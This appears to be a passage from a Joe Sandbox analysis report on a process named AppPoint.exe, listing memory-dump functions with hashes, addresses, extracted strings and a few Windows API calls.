Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7a74017867f0a4c33d3d5d95c15c4afc98151cbc79599c1f85c8372c8be3d0d5
Instruction ID: 58f78c5382220ccfe3ba33e7aa988a9fb475e6e1ec287909202fa2786fae0666
Opcode Fuzzy Hash: 7a74017867f0a4c33d3d5d95c15c4afc98151cbc79599c1f85c8372c8be3d0d5
Instruction Fuzzy Hash: 511122B5800248DFCB10DFA9C889BEEFBF8FB48350F10841AE519A3610C379A944CFA1

Function 00C6E4C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C6E526

Memory Dump Source

Source File: 00000008.00000002.2273904789.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c60000_AppPoint.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 066bef5fb367fb96601650f87b30ba4927644cbce63bdef860114ce7cf46d688
Instruction ID: 8bed6a48f2caa39efe78bbc4768eb34490bb739992920486106a25fa35d3d8bb
Opcode Fuzzy Hash: 066bef5fb367fb96601650f87b30ba4927644cbce63bdef860114ce7cf46d688
Instruction Fuzzy Hash: B21110B5C006498FDB20DF9AD484ADEFBF4EF88314F14841AD42AB7200D379A645CFA1

Function 04E608D4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 04E66B1D

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 51250f930107f54a8cd982a7dccb4c565e257522fde769b7db8aefb3099d1bba
Instruction ID: 909a1109cbe355ec17134531c1581777f96f15405850a8494e7499ac6cc22e76
Opcode Fuzzy Hash: 51250f930107f54a8cd982a7dccb4c565e257522fde769b7db8aefb3099d1bba
Instruction Fuzzy Hash: 7D11F2B5900348DFDB10DF9AC489BDEFBF8EB48310F14841AE51AA7200D379A944CFA5

Function 08F5A6C1 Relevance: 1.3, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,08F5A579,?,?), ref: 08F5A720

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b49b2a500d4281ae3571b64e367db2cc4d766c73a24a3ca6d188d6446183f350
Instruction ID: 09a93ff06ec234d6c56dedd9cf29b34f61f9f69c7ebe51f7ff5ce7d784acec11
Opcode Fuzzy Hash: b49b2a500d4281ae3571b64e367db2cc4d766c73a24a3ca6d188d6446183f350
Instruction Fuzzy Hash: D11188B58006498FCB20DFA9D544BDEFBF4EF48320F14801AD918A7300C338AA44CFA5

Function 08F58794 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,08F5A579,?,?), ref: 08F5A720

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b6b3f12d9638b711f5cf0796833e071b06bc7d2b8bbe681a065be94557d4efed
Instruction ID: e00eaee654f410c8ee46513958d1ac1e25a6c7ebd5e6ad719cb8c708aa4a1454
Opcode Fuzzy Hash: b6b3f12d9638b711f5cf0796833e071b06bc7d2b8bbe681a065be94557d4efed
Instruction Fuzzy Hash: B71155B18006488FCB20DF9AC444BEEBBF4EF48320F10841ADA59A7340D338A944CFA5

Function 00BCD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273382739.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bcd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4d99d6f83d16cfee98525dd5c5879ddbdb777bfc475b9252617d58d5c8975e7
Instruction ID: c55fce5af843cf8bb4794b45977d37d0813f1f88a72da451e91701321d30bf10
Opcode Fuzzy Hash: a4d99d6f83d16cfee98525dd5c5879ddbdb777bfc475b9252617d58d5c8975e7
Instruction Fuzzy Hash: AC210379500240DFDB05DF14D9C0F26BFA5FBA8318F20C5BDE9090B256C33AD816DAA2

Function 00BDD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273482993.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bdd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a35d0dd9c58e9cd3483473355e019b107697d9d3204e6a299940ad1dee0b0735
Instruction ID: 5f80942277ab22a1f92c84248a37dc78a3c41e93c11d253de46fd335a1d16017
Opcode Fuzzy Hash: a35d0dd9c58e9cd3483473355e019b107697d9d3204e6a299940ad1dee0b0735
Instruction Fuzzy Hash: F521D075604204DFCB14DF24D9D4B26FBA5EB88314F24C5AAD98A4B396D33AD806CAA1

Function 00BDD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273482993.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bdd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d85c85e61bea8837c7cb383a964477d0ea89d72fd8db7893f995d0f400d3a6aa
Instruction ID: 8d76053d66dbfdc95ab9bac49d1964a19456aaefb87836daf7f0a1310e0a38da
Opcode Fuzzy Hash: d85c85e61bea8837c7cb383a964477d0ea89d72fd8db7893f995d0f400d3a6aa
Instruction Fuzzy Hash: F121F271644204EFDB05DF64D9C0F26FBA5FB88314F20C5AEE9894B396D33AD806CA61

Function 00BDD005 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273482993.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bdd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873562e31c2691b2300e8d77cb04283a1e40d1765e2069ce503dcb35544c0fba
Instruction ID: 7214868f65f6704246760ec64be48bec322cb585042679d934a83100a7006d89
Opcode Fuzzy Hash: 873562e31c2691b2300e8d77cb04283a1e40d1765e2069ce503dcb35544c0fba
Instruction Fuzzy Hash: B52195755093808FCB12CF24D594715FF71EB45314F28C5DBD8898B697C33A980ACB62

Function 00BCD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273382739.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bcd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 2c2bd39dd699565ee4545749d0c2a5d0fa845062d58735ddd3d2646ae856f0f4
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 0011D376504280CFCB16CF14D9C4B16BFB1FBA8314F24C6ADD9490B656C336D85ACBA2

Function 00BDD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273482993.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bdd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: f1faea125bc83c7d3b5be50582310029e7aec22980982cb534ac42f409409a6d
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: B1118B75504280DFDB16CF14D5C4B15FBB1FB84314F24C6AAD8894B796D33AD84ACB62

Function 00BCD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273382739.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bcd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b1cb3679bd613d7a09b385659e13ad01a8368b29bd99e03dc39d844b021050
Instruction ID: 550a88a8683254996c2034974913523343bf04511e7d4bb77232ce4f8ca4a8da
Opcode Fuzzy Hash: e2b1cb3679bd613d7a09b385659e13ad01a8368b29bd99e03dc39d844b021050
Instruction Fuzzy Hash: 3501DF351043409AE7209A29CDC4F66BFD8EF86320F18C5BFED180A286C2799C01CAB1

Function 00BCD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2273382739.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bcd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1f3f33ba9989c9d2f9468e280bf6da6765bdc2927c74342e979c1211da74b21
Instruction ID: b5498319870d8630f6b0c8e0c56bcf92a681249757b4fee372d14ecee0e28c48
Opcode Fuzzy Hash: f1f3f33ba9989c9d2f9468e280bf6da6765bdc2927c74342e979c1211da74b21
Instruction Fuzzy Hash: 0BF06275504344AAEB108F16CC88B62FFD8EF95734F18C56EED484A286C2799C44CAB1

Analysis Process: AppPoint.exePID: 7512, Parent PID: 7392COMMON

Executed Functions

Function 06523600 Relevance: 5.6, Strings: 4, Instructions: 605COMMON

Download Yara Rule

Strings

$]q, xrefs: 06523DD7
$]q, xrefs: 06523E14
$]q, xrefs: 06523DFE
$]q, xrefs: 06523DE3

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 5da461ea2cd408a4197c4567b075c1f7291b4737f9855a2a4c928d2355fcb5ae
Instruction ID: 7143983fa5de3d99b9e0b7e1b537b0390522dcecad7e0a9744f1e134b3a039b9
Opcode Fuzzy Hash: 5da461ea2cd408a4197c4567b075c1f7291b4737f9855a2a4c928d2355fcb5ae
Instruction Fuzzy Hash: 40423E31E1061A8BCB54EF75C89569DB7F2FFC9340F1086A9D40AAB254EF309E85CB81

Function 065282B8 Relevance: 3.0, Strings: 2, Instructions: 520COMMON

Download Yara Rule

Strings

$]q, xrefs: 065288DE
$]q, xrefs: 065288D2

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: bcf165bbb6ad682cc16569b973386e8041876bcd279508a72a692565bee752cd
Instruction ID: 4d808489555b46e672f25a446d1658c08e23c7fcf4b1218857b7397a230b296a
Opcode Fuzzy Hash: bcf165bbb6ad682cc16569b973386e8041876bcd279508a72a692565bee752cd
Instruction Fuzzy Hash: 11029F31B002169FDB58DBB9D451A6EB7E2FF85344F148869E406EB385DF34DC4A8B81

Function 06526058 Relevance: 2.9, Strings: 2, Instructions: 414COMMON

Download Yara Rule

Strings

XPbq, xrefs: 06526169
\Obq, xrefs: 065261AC

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: XPbq$\Obq
API String ID: 0-409418754
Opcode ID: f2f3f24fd319d72d0f531adef15ccd94bd3d968a557bd32b0905ec993679b69e
Instruction ID: ecb3c88591ae3d23a84be133247ca30c425b284c1d4e0cddbbf2401e85d595b9
Opcode Fuzzy Hash: f2f3f24fd319d72d0f531adef15ccd94bd3d968a557bd32b0905ec993679b69e
Instruction Fuzzy Hash: 55D1E331B101268FDB54DF68D4906AEBBF2FF8A710F25846AE44ADB391CA31DC45CB90

Function 00E9BA20 Relevance: 2.9, Instructions: 2901COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc33b093600f852d7326c529214149b007f5fbdec99a0ccb9b1b65e0c974b6b9
Instruction ID: 89399955d8218e137e92c5bba77f49ad56e71b4883879b9ce0a75e623b0b9cca
Opcode Fuzzy Hash: cc33b093600f852d7326c529214149b007f5fbdec99a0ccb9b1b65e0c974b6b9
Instruction Fuzzy Hash: 1E630931D10B1A8ACB51EF68C8805ADF7B1FF99300F15D79AE45877221EB70AAD5CB81

Function 065258D8 Relevance: 1.9, Strings: 1, Instructions: 610COMMON

Download Yara Rule

Strings

$, xrefs: 06525C2E

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: d794f305e926e8bc4ca1fcebf368ed3283fa174f2382d97f0e175a9325e5f659
Instruction ID: 67550b62e1495ff1ddbe37f9d87ff98a0d58633756add1a3b0145e22959199cd
Opcode Fuzzy Hash: d794f305e926e8bc4ca1fcebf368ed3283fa174f2382d97f0e175a9325e5f659
Instruction Fuzzy Hash: CF22A171E002168FDB65DFA4C4906AEB7F2FF86310F148469E44AAB385EB35DD42CB91

Function 00E94410 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vim, xrefs: 00E946C7

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID: \Vim
API String ID: 0-1335029775
Opcode ID: d0c2597d0a3560704c5fbd98c6d71ca91a4bee206dde2700a4f5a05cdfe9f2a0
Instruction ID: 508f0dcbc372f93ffe76a4265c76a005bdf959eb4f43003f7ad3b9d2e3d00f36
Opcode Fuzzy Hash: d0c2597d0a3560704c5fbd98c6d71ca91a4bee206dde2700a4f5a05cdfe9f2a0
Instruction Fuzzy Hash: 4CB151B0E00209DFDF10CFA9D985BDDBBF2AF89318F149529D815B7294EB749846CB81

Function 00E940C8 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vim, xrefs: 00E94313

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID: \Vim
API String ID: 0-1335029775
Opcode ID: e1f9d4977f3fb4c7fe663bd7633df016286dd5c9b716da9267a62a3954097eaa
Instruction ID: 263e840513c19da0cc2e42909f3aa5e1eddf1e997847a5c5da7287cecf155699
Opcode Fuzzy Hash: e1f9d4977f3fb4c7fe663bd7633df016286dd5c9b716da9267a62a3954097eaa
Instruction Fuzzy Hash: 1B912EB0E002099FDF14CFA9C985BDDBBF2BF88314F149129E415B7294EB749986CB91

Function 06526980 Relevance: .9, Instructions: 872COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c012b7b086d886d67285e55c4b03ab7eb5265e0781463539ef03e8802e51070
Instruction ID: dd836680b5caea6a51c2a5b330d831bc82b228d1b76cd4374745f0263d55800f
Opcode Fuzzy Hash: 2c012b7b086d886d67285e55c4b03ab7eb5265e0781463539ef03e8802e51070
Instruction Fuzzy Hash: 2762BC30B002169FDB54DB68D551AAEB7F2FF89340F248469E40AEB395DB35ED46CB80

Function 0652CC50 Relevance: .7, Instructions: 738COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d501c0eb6f97cddcd547fec7f5e0fdb8934d63d0097e5341031cb0c1ce86e50
Instruction ID: 8d9afa27453ce7cee3fd67c01a5595fd38bd3196151b4b21ecf04e754aaf5963
Opcode Fuzzy Hash: 8d501c0eb6f97cddcd547fec7f5e0fdb8934d63d0097e5341031cb0c1ce86e50
Instruction Fuzzy Hash: 7B428E31B0011A9FDF54EB68D491AAEB7F6FF85380F108569E406EB395DE34DC428B91

Function 00E9B210 Relevance: .6, Instructions: 650COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a8d9d4c59fc070aaa8a72bb6ec7df4404961f7f0d3ddb42b8d48a4e74b1f967
Instruction ID: 907e8ffe580da40542b460f8119b5c5a36149a2ebd6ae0abfc8a4dfc0528edf0
Opcode Fuzzy Hash: 6a8d9d4c59fc070aaa8a72bb6ec7df4404961f7f0d3ddb42b8d48a4e74b1f967
Instruction Fuzzy Hash: 81328D34A002058FCF14DFA8E695AADBBF6EF88314F148569E409EB395DB34DC46CB51

Function 00E9E990 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0f18b51a773d006e2b9a1026dc17f4e0ea383eb94aef5960f367926065ab56
Instruction ID: e431eff72c9edff3de54e512a34129648475c08ac568b63bbbff0605335a72be
Opcode Fuzzy Hash: 4d0f18b51a773d006e2b9a1026dc17f4e0ea383eb94aef5960f367926065ab56
Instruction Fuzzy Hash: 49229D31B002159FDF14DFA8C890AAEBBF6EF88314F149469E509EB355DA34EC46CB91

Function 00E94CE0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 334eda72bb49725eb71d3ff0d1068f949462b21e5c50ac59a38eb973e6ce2289
Instruction ID: 772db73fbed1e653a12d781bfa17ab55fb6f007fc191b7f32894550b791fde95
Opcode Fuzzy Hash: 334eda72bb49725eb71d3ff0d1068f949462b21e5c50ac59a38eb973e6ce2289
Instruction Fuzzy Hash: 87B142B1E00209CFDF14CFA9D981B9DBBF2BF88718F149529D415BB294EB749846CB81

Function 0652B6A8 Relevance: 10.4, Strings: 8, Instructions: 416COMMON

Download Yara Rule

Strings

$]q, xrefs: 0652B7D9
$]q, xrefs: 0652B8A2
$]q, xrefs: 0652B873
$]q, xrefs: 0652B7E5
$]q, xrefs: 0652B832
$]q, xrefs: 0652B896
$]q, xrefs: 0652B867
$]q, xrefs: 0652B83E

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 97075f8fbd57b09be7c9a01c060d85f35f86acd68ca38763707bf9108b2f8706
Instruction ID: b5ed2ec5cd2c632ea8fba033bb159a21826b7f1c5158d7cf4ac8b6a43bd5d7d0
Opcode Fuzzy Hash: 97075f8fbd57b09be7c9a01c060d85f35f86acd68ca38763707bf9108b2f8706
Instruction Fuzzy Hash: 2FE16E30E1021A8FCF68DF69D4916AEB7F6FF85344F148529D40AAB395DF349846CB81

Function 0652C0C0 Relevance: 5.3, Strings: 4, Instructions: 306COMMON

Download Yara Rule

Strings

$]q, xrefs: 0652C67B
$]q, xrefs: 0652C687
$]q, xrefs: 0652C6AF
$]q, xrefs: 0652C6BB

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 38c3a83b1100f7015333b11bdd3f19bd0b0671d9e6a5c648ef8fb1ec462d9f4a
Instruction ID: 0a9ad278773ac0cce06a8319d54e497e7d31557e4b66e26e8575679cb778bdb3
Opcode Fuzzy Hash: 38c3a83b1100f7015333b11bdd3f19bd0b0671d9e6a5c648ef8fb1ec462d9f4a
Instruction Fuzzy Hash: DDB16270E1011A9BDFA4CBA8D8847AEB7F1FB46750F108926E455EB382DB34DC85CB91

Function 065297E0 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

$]q, xrefs: 065298C9
$]q, xrefs: 065298B3
$]q, xrefs: 06529847
$]q, xrefs: 06529853

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 887512d2bc0db8dc11389ee340580d88c7728f5bfc37b5aa8c32693726e03850
Instruction ID: 8f3d798cdcf9280d87e6f548cabd274db7df08169d4e3516218e9c1879f0154c
Opcode Fuzzy Hash: 887512d2bc0db8dc11389ee340580d88c7728f5bfc37b5aa8c32693726e03850
Instruction Fuzzy Hash: D2C1E830E0022A9FDB64DF65C851BDEB7F2BF89744F1085A9D409AB384DB309E858F91

Function 0652DB80 Relevance: 4.7, Strings: 3, Instructions: 911COMMON

Download Yara Rule

Strings

$]q, xrefs: 0652E027
$]q, xrefs: 0652E01B
$]q, xrefs: 0652E013

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: 2869c1b353432f31a6c106c8c573af20ad88b65520beaafbf2cfdd90427e22a2
Instruction ID: 4dfc39ed3172e490e3f7cc2933baa9b68119cd6c7be3e2d0a62115bb7b99904d
Opcode Fuzzy Hash: 2869c1b353432f31a6c106c8c573af20ad88b65520beaafbf2cfdd90427e22a2
Instruction Fuzzy Hash: 3D725E34A0021A9FCB54EB64C452BADB7F3FF85780F1185A9D40AAB385DE319D82CF95

Function 06524E98 Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

\Obq, xrefs: 0652504B
XPbq, xrefs: 06524FBC
fbq, xrefs: 06524EC3

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq
API String ID: 0-4057264190
Opcode ID: 38ea4162c599b95f79211414f37978046a7ec6d17a00715d8ca3c9ebf53d5e5a
Instruction ID: a162364a15dca8f302298684e934eeefd353aecd61fd5d261559b12b2d1d3d67
Opcode Fuzzy Hash: 38ea4162c599b95f79211414f37978046a7ec6d17a00715d8ca3c9ebf53d5e5a
Instruction Fuzzy Hash: 8D518030F0011A9FEB549FA9C8157AEBAE6FF88750F204429E506EB3D4DE794D068F91

Function 065297CF Relevance: 2.7, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

$]q, xrefs: 065298B3
$]q, xrefs: 06529847

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: e8f8b3a38abbd972d569b72b359f78552c58dbfe85dbd87f96fa768946d84809
Instruction ID: 40025591b6e9d97e3ce8df82665bffc97159af9432844ea99d0b0b7a088122ad
Opcode Fuzzy Hash: e8f8b3a38abbd972d569b72b359f78552c58dbfe85dbd87f96fa768946d84809
Instruction Fuzzy Hash: 9691F770E0022A9FDB64DB65C851BDEB7F2FF89780F1044A9950DAB394DA309E85CF91

Function 00E94A58 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

\Vim, xrefs: 00E94AC7
\Vim, xrefs: 00E94C1A

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID: \Vim$\Vim
API String ID: 0-301330408
Opcode ID: 272c5c5a51edc69582b075bd092427dcd07fb6afbc0d1c68097f44a2fd9b9b98
Instruction ID: 5d70423dcda422915c0132e12ee7184189cdb6974935898687cea01ce2946a75
Opcode Fuzzy Hash: 272c5c5a51edc69582b075bd092427dcd07fb6afbc0d1c68097f44a2fd9b9b98
Instruction Fuzzy Hash: 85713CB0E002099FDF14DFA9C885BDEFBF2AF88314F149129D415B7294EB749842CB91

Function 00E94A4F Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

\Vim, xrefs: 00E94AC7
\Vim, xrefs: 00E94C1A

Memory Dump Source

Source File: 0000000A.00000002.4519141813.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_e90000_AppPoint.jbxd

Similarity

API ID:
String ID: \Vim$\Vim
API String ID: 0-301330408
Opcode ID: fc9a4f2fc290fd875a315a552a4e75d15e8570895a99801aadd10b0d56c3bebc
Instruction ID: 90ee46560229411b10e250bbeaf322eb1e18f4dee2199b81aa004fbb9181222f
Opcode Fuzzy Hash: fc9a4f2fc290fd875a315a552a4e75d15e8570895a99801aadd10b0d56c3bebc
Instruction Fuzzy Hash: 53713BB0E002099FDF14DFA9C885BDEFBF1AF88318F149129D419B7294EB749846CB91

Function 06524E8A Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

XPbq, xrefs: 06524FBC
fbq, xrefs: 06524EC3

Memory Dump Source

Source File: 0000000A.00000002.4542995379.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6520000_AppPoint.jbxd

Similarity

API ID:
String ID: fbq$XPbq
API String ID: 0-2292610095
Opcode ID: d7e39ea8a1b5c45851e86f0ad7e5a71acf1ad8ae4405a26ffea6b07e9c8e3a62
Instruction ID: 7b09cf78b3f412b212137f031d14e67587f930e6b97fde294ae068e57bd974bb
Opcode Fuzzy Hash: d7e39ea8a1b5c45851e86f0ad7e5a71acf1ad8ae4405a26ffea6b07e9c8e3a62
